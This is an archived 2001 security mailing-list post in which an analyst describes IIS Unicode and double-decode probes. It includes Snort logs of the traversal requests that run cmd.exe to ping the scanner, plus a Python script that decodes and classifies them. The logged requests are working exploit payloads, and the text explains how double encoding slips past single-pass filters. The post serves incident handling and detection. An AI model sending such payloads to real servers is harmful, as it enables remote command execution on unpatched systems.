Security Incidents mailing list archives

Unusual IIS decode requests


From: "Jason Robertson" <jason () ifutureinc com>
Date: Sun, 29 Jul 2001 16:59:14 -0400


Hrm.. well, I just received something today, well, a few days ago.. I just got around to
writing this up. (I must work too hard, doing this on a Sunday.)

Anyway, as it looks, this user was attempting to find IIS servers that were
unpatched for the Unicode bug. But what makes this one unusual is that, instead of the
common winnt/cmd.exe /c dir c:, this user used
winnt/cmd.exe /c ping -n 1 -l 128 -w 1, which I find pretty unusual.

But it does seem to be a smart method of testing, as this does eliminate some of
the overhead: the dir c: could time out, if and only if someone put a large
number of files in c:\, and to really be annoying, put a large number of 0-byte files in
C:\. This could give you a large number of files with a very low amount of wasted
space (though it is still a waste of space because of the name, time, and ACL entries),
but what can you do.



[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:37:13pm    24.41.72.83:1712 -> 216.18.61.203:80
TTL: 47 TOS: 0x224      ID:0
***AP**F Seq: 672966764 Ack: 2100864331 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................

[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:37:13pm    24.41.72.83:1714 -> 216.18.61.202:80
TTL: 47 TOS: 0x0        ID:0
***AP**F Seq: 680331733 Ack: 2100928858 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................

[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:37:13pm    24.41.72.83:1715 -> 216.18.61.201:80
TTL: 47 TOS: 0x0        ID:0
***AP**F Seq: 684366937 Ack: 2101034143 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................

[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:37:16pm    24.41.72.83:1711 -> 216.18.61.205:80
TTL: 47 TOS: 0x0        ID:0
***AP**F Seq: 676101846 Ack: 2101820142 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................

[**] WEB-IIS multiple decode attempt [**]
Jul 27,01 12:37:22pm    24.41.72.83:1946 -> 216.18.61.205:80
TTL: 47 TOS: 0x0        ID:0
***AP*** Seq: 676258451 Ack: 2106779224 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
2535632E2E25356377696E6E742F73797374656D        %5c..%5cwinnt/system
33322F636D642E6578653F2F632B70696E672B2D        32/cmd.exe?/c+ping+-
6E2B312B2D6C2B3132382B2D772B312B32342E34        n+1+-l+128+-w+1+24.4
312E37322E383320485454502F312E300A0A0000        1.72.83.HTTP/1.0....
3C85034038700140CF0700006ECD004020990408        <..@8p.@....n..@....
446A0140C04812401ECE00408C71014098720140        Dj.@.H.@...@.q.@.r.@
2C99040801000000F28204086E43124020990408        ,...........nC.@....
446A0140C04812400100000060431240006B0140        Dj.@.H.@....`C.@.k.@
10F6FFBFA185040820990408009A0408                ................    

[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:37:25pm    24.41.72.83:1701 -> 216.18.61.216:80
TTL: 47 TOS: 0x0        ID:0
***AP**F Seq: 672736508 Ack: 2100687070 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................

[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:37:28pm    24.41.72.83:2151 -> 216.18.61.207:80
TTL: 47 TOS: 0x0        ID:0
***AP**F Seq: 690117489 Ack: 2106691395 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................

[**] WEB-IIS multiple decode attempt [**]
Jul 27,01 12:37:55pm    24.41.72.83:1709 -> 216.18.61.206:80
TTL: 47 TOS: 0x0        ID:0
***AP*** Seq: 679791880 Ack: 2118977419 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
2535632E2E25356377696E6E742F73797374656D        %5c..%5cwinnt/system
33322F636D642E6578653F2F632B70696E672B2D        32/cmd.exe?/c+ping+-
6E2B312B2D6C2B3132382B2D772B312B32342E34        n+1+-l+128+-w+1+24.4
312E37322E383320485454502F312E300A0A0000        1.72.83.HTTP/1.0....
3C85034038700140CF0700006ECD004020990408        <..@8p.@....n..@....
446A0140C04812401ECE00408C71014098720140        Dj.@.H.@...@.q.@.r.@
2C99040801000000F28204086E43124020990408        ,...........nC.@....
446A0140C04812400100000060431240006B0140        Dj.@.H.@....`C.@.k.@
10F6FFBFA185040820990408009A0408                ................    

[**] WEB-IIS cmd.exe access [**]
Jul 27,01 12:40:20pm    24.41.72.83:1843 -> 216.18.61.201:80
TTL: 47 TOS: 0x0        ID:0
***AP**F Seq: 686495535 Ack: 2105591950 Win: 5840

3872014001474554202F736372697074732F2E2E        8r.@.GET./scripts/..
25323535632E2E253235356377696E6E742F7379        %255c..%255cwinnt/sy
7374656D33322F636D642E6578653F2F632B7069        stem32/cmd.exe?/c+pi
6E672B2D6E2B312B2D6C2B3132382B2D772B312B        ng+-n+1+-l+128+-w+1+
32342E34312E37322E383320485454502F312E30        24.41.72.83.HTTP/1.0
0A0A00003C85034038700140CF0700006ECD0040        ....<..@8p.@....n..@
20990408446A0140C04812401ECE00408C710140        ....Dj.@.H.@...@.q.@
987201402C99040801000000F28204086E431240        .r.@,...........nC.@
20990408446A0140C04812400100000060431240        ....Dj.@.H.@....`C.@
006B014010F6FFBFA185040820990408009A0408        .k.@................


------- End of forwarded message -------

---
Jason Robertson                
Network Analyst            
jason () ifutureinc com    
http://www.astroadvice.com      
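An added example, not part of the post above: a small Python triage script that rebuilds the request line from the snort hex column of the first alert, decodes the path the way IIS did (one %XX pass per round, with overlong two-byte UTF-8 forms such as %c0%af folded to the ASCII they encode), flags traversal that reaches cmd.exe, and records the detail that makes this probe work without reading the HTTP response: the ping target is the scanning host itself (24.41.72.83 is both the source address and the ping argument), so the scanner only has to watch for an ICMP echo request arriving from the web server. The function names, the tags returned by classify(), and the three extra sample requests (a %c0%af variant, a single-%5c variant, and a benign query) are my own constructions; the HEXDUMP constant is the hex column of the first alert, copied verbatim.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: the hex column of the first alert in the post, copied
# verbatim; the ASCII column is dropped so the payload is rebuilt from hex only.
HEXDUMP = """
3872014001474554202F736372697074732F2E2E
25323535632E2E253235356377696E6E742F7379
7374656D33322F636D642E6578653F2F632B7069
6E672B2D6E2B312B2D6C2B3132382B2D772B312B
32342E34312E37322E383320485454502F312E30
"""

REQUEST_RE = re.compile(rb'(GET|POST|HEAD) \S+ HTTP/\d\.\d')
IPV4_RE = re.compile(r'^(?:\d{1,3}\.){3}\d{1,3}$')


def request_from_hexdump(dump: str) -> str:
    """Rebuild the packet payload from snort's hex column and pull out the request line."""
    payload = bytes.fromhex(''.join(l.split()[0] for l in dump.splitlines() if l.strip()))
    m = REQUEST_RE.search(payload)
    if not m:
        raise ValueError('no HTTP request line in payload')
    return m.group(0).decode('ascii')


def decode_once(s: str) -> str:
    """One IIS-style decoding pass: %XX unescape, then fold overlong two-byte
    UTF-8 forms (e.g. %c0%af for '/', %c1%9c for '\\') to the ASCII they encode."""
    raw = unquote_to_bytes(s.encode('latin-1'))
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))          # latin-1: every byte stays visible
            i += 1
    return ''.join(out)


def decode_rounds(path: str, max_rounds: int = 4) -> list:
    """Decode until the string stops changing; forms[0] is the wire form."""
    forms = [path]
    for _ in range(max_rounds):
        nxt = decode_once(forms[-1])
        if nxt == forms[-1]:
            break
        forms.append(nxt)
    return forms


def escapes_webroot(path: str) -> bool:
    """True if '..' segments climb above the URL root (/scripts/..\\..\\winnt does)."""
    depth = 0
    for seg in path.replace('\\', '/').split('/'):
        if seg == '..':
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != '.':
            depth += 1
    return False


def analyze(src_ip: str, request_line: str) -> dict:
    """Triage one request line: decoding depth, traversal, command, callback target."""
    method, target, _ = request_line.split(' ', 2)
    path, _, query = target.partition('?')
    forms = decode_rounds(path)
    final = forms[-1]
    # '+' is form-encoded space: '/c+ping+-n+1+...' -> ['/c', 'ping', '-n', '1', ...]
    args = [decode_once(a) for a in query.split('+') if a]
    command = args[1] if len(args) > 1 and args[0].lower() == '/c' else None
    targets = [a for a in args if IPV4_RE.match(a)]
    return {
        'decoded_path': final,
        'decode_rounds': len(forms) - 1,
        'traversal': escapes_webroot(final),
        'cmd_exe': final.lower().endswith('cmd.exe'),
        'command': command,
        'callback_to_source': src_ip in targets,   # ping aimed back at the scanner
    }


def classify(r: dict) -> str:
    if not (r['traversal'] and r['cmd_exe']):
        return 'benign'
    tag = 'double decode traversal' if r['decode_rounds'] >= 2 else 'single-pass decode traversal'
    if r['command'] == 'ping' and r['callback_to_source']:
        tag += ' + out-of-band ping callback'
    return tag


if __name__ == '__main__':
    req = request_from_hexdump(HEXDUMP)
    print(req)
    r = analyze('24.41.72.83', req)
    print(r['decoded_path'], '->', classify(r))
```

The %255c requests need two decoding rounds before the backslashes appear, which is why a filter that decodes once and checks for ".." misses them; the ping callback in turn only tells the scanner anything if the web server is allowed to send ICMP echo requests outbound, so the same alert is worth checking against the egress policy of the web tier.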

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

